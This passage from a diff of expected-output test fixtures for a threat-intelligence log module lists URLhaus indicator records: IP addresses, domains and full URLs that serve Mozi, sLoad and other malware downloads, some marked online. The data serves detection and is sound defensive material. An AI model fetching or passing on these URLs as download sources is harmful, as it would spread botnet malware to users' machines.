"threatintel.indicator.url.original": "http://182.117.93.110:50587/bin.sh", + "threatintel.indicator.url.path": "/bin.sh", + "threatintel.indicator.url.port": 50587, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961517/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 11386, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "110.251.5.169", + "threatintel.indicator.first_seen": "2021-01-14T21:04:08.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "110.251.5.169", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://110.251.5.169:48322/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 48322, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961515/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 11742, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "101.51.117.186", + "threatintel.indicator.first_seen": "2021-01-14T21:04:06.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "101.51.117.186", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://101.51.117.186:33317/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 33317, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961513/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 12093, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "121.151.78.166", + "threatintel.indicator.first_seen": "2021-01-14T21:04:05.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "121.151.78.166", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://121.151.78.166:41516/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 41516, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961514/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 12444, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "116.72.92.97", + "threatintel.indicator.first_seen": "2021-01-14T21:04:05.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "116.72.92.97", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://116.72.92.97:57798/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 57798, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961509/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 12791, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "27.218.15.209", + "threatintel.indicator.first_seen": "2021-01-14T21:04:04.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "27.218.15.209", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://27.218.15.209:47671/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 47671, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961510/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 13140, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "120.85.171.210", + "threatintel.indicator.first_seen": "2021-01-14T21:04:04.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "120.85.171.210", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://120.85.171.210:57690/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 57690, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961511/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 13491, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "32-bit", + "elf", + "mips" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "117.251.59.53", + "threatintel.indicator.first_seen": "2021-01-14T21:04:04.000Z", + "threatintel.indicator.provider": "geenensp", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "117.251.59.53", + "threatintel.indicator.url.original": "http://117.251.59.53:50611/i", + "threatintel.indicator.url.path": "/i", + "threatintel.indicator.url.port": 50611, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961512/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 13848, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "115.58.83.167", + "threatintel.indicator.first_seen": "2021-01-14T21:04:04.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "115.58.83.167", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://115.58.83.167:34141/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34141, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961507/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 14197, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "94.178.124.83", + "threatintel.indicator.first_seen": "2021-01-14T20:52:08.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "94.178.124.83", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://94.178.124.83:44399/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 44399, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961508/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 14553, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.122.75.232", + "threatintel.indicator.first_seen": "2021-01-14T20:52:08.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.122.75.232", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://182.122.75.232:49120/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 49120, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961506/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 14911, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "115.63.202.43", + "threatintel.indicator.first_seen": "2021-01-14T20:52:07.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "115.63.202.43", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://115.63.202.43:51136/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 51136, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961504/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 15267, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "59.99.40.204", + "threatintel.indicator.first_seen": "2021-01-14T20:52:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "59.99.40.204", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://59.99.40.204:45773/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 45773, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961505/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 15621, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "117.247.128.213", + "threatintel.indicator.first_seen": "2021-01-14T20:52:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "117.247.128.213", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://117.247.128.213:56528/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 56528, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961500/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 15981, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "14.137.219.132", + "threatintel.indicator.first_seen": "2021-01-14T20:52:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "14.137.219.132", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://14.137.219.132:44427/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 44427, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961501/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 16339, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.224.40.14", + "threatintel.indicator.first_seen": "2021-01-14T20:52:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.224.40.14", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.224.40.14:36134/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 36134, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961502/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 16693, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "186.33.104.107", + "threatintel.indicator.first_seen": "2021-01-14T20:52:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "186.33.104.107", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://186.33.104.107:43973/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 43973, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961503/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 17051, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "85.105.16.154", + "threatintel.indicator.first_seen": "2021-01-14T20:52:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "85.105.16.154", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://85.105.16.154:41319/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 41319, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961496/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 17407, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "178.141.73.115", + "threatintel.indicator.first_seen": "2021-01-14T20:52:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "178.141.73.115", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://178.141.73.115:51847/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 51847, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961497/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 17765, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "186.33.104.135", + "threatintel.indicator.first_seen": "2021-01-14T20:52:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "186.33.104.135", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://186.33.104.135:54469/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 54469, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961498/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 18123, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "115.56.159.43", + "threatintel.indicator.first_seen": "2021-01-14T20:52:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "115.56.159.43", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://115.56.159.43:34547/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34547, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961499/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 18479, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.230.138.170", + "threatintel.indicator.first_seen": "2021-01-14T20:52:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.230.138.170", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.230.138.170:33932/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 33932, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961494/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 18837, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:47.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://univirtek.com/viro/02478080035/blank.jpg", + "threatintel.indicator.url.path": "/viro/02478080035/blank.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961495/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 19207, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:47.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://univirtek.com/viro/FRRNDR77C25D325O/map.png", + "threatintel.indicator.url.path": "/viro/FRRNDR77C25D325O/map.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961492/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 19580, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:45.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg", + "threatintel.indicator.url.path": "/ladi/CNNSRG83H04F158R/blank.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961493/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 19961, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:45.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/02328510512/logo.css", + "threatintel.indicator.url.path": "/leto/02328510512/logo.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961490/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 20332, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:51:44.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://cxminute.com/minu/MLILSN74B21E507L/uk.png", + "threatintel.indicator.url.path": "/minu/MLILSN74B21E507L/uk.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961491/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 20702, + "service.type": 